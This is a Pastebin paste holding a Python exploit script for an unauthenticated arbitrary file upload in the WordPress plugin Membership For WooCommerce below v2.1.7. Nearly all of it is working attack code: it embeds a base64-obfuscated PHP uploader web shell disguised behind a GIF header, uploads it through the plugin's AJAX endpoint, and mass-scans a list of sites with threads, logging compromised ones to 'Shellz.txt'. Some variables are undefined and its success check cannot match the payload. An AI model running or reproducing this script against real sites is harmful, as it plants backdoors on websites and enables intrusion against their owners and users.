FlyFar

Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell

Apr 7th, 2024
76
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.91 KB | Cybersecurity | 0 0
  1. # Exploit Title: Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)
  2. # Date: 2024-02-25
  3. # Author: Milad Karimi (Ex3ptionaL)
  4. # Category : webapps
  5. # Tested on: windows 10 , firefox
  6.  
  7. import sys , requests, re , json
  8. from multiprocessing.dummy import Pool
  9. from colorama import Fore
  10. from colorama import init
  11. init(autoreset=True)
  12.  
  13. headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0',
  14. 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux;
  15. Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like
  16. Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept':
  17. 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
  18. 'Accept-Encoding': 'gzip, deflate', 'Accept-Language':
  19. 'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'}
  20.  
  21. uploader = """
  22. GIF89a
  23. <?php ?>
  24. <!DOCTYPE html>
  25. <html>
  26. <head>
  27.  <title>Resultz</title>
  28. </head>
  29. <body><h1>Uploader</h1>
  30.  <form enctype='multipart/form-data' action='' method='POST'>
  31.    <p>Uploaded</p>
  32.    <input type='file' name='uploaded_file'></input><br />
  33.    <input type='submit' value='Upload'></input>
  34.  </form>
  35. </body>
  36. </html>
  37. <?PHP
  38. if(!empty($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')])){$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=base64_decode('Li8=');$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485.basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]);if(move_uploaded_file($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('dG1wX25hbWU=')],$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485)){echo
  39. base64_decode('VGhlIGZpbGUg').basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]).base64_decode('IGhhcyBiZWVuIHVwbG9hZGVk');}else{echo
  40. base64_decode('VGhlcmUgd2FzIGFuIGVycm9yIHVwbG9hZGluZyB0aGUgZmlsZSwgcGxlYXNlIHRyeSBhZ2FpbiE=');}}?>
  41. """
  42. requests.urllib3.disable_warnings()
  43.  
  44. def Exploit(Domain):
  45.     try:
  46.         if 'http' in Domain:
  47.           Domain = Domain
  48.         else:
  49.           Domain = 'http://'+Domain
  50.         myup = {'': ('db.php', uploader)}
  51.         req = requests.post(Domain +
  52. '/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload',
  53. files=myup, headers=headers,verify=False, timeout=10).text
  54.         req1 = requests.get(Domain +
  55. '/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php')
  56.         if 'Ex3ptionaL' in req1:
  57.           print (fg+'[+] '+ Domain + ' --> Shell Uploaded')
  58.           open('Shellz.txt', 'a').write(Domain +
  59. '/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php' + '\n')
  60.         else:
  61.           print (fr+'[+] '+ Domain + '{}{} --> Not Vulnerability')
  62.     except:
  63.         print(fr+' -| ' + Domain + ' --> {} [Failed]')
  64.  
  65. target = open(input(fm+"Site List: "), "r").read().splitlines()
  66. mp = Pool(int(input(fm+"Threads: ")))
  67. mp.map(Exploit, target)
  68. mp.close()
  69. mp.join()
  70.            
Add Comment
Please, Sign In to add comment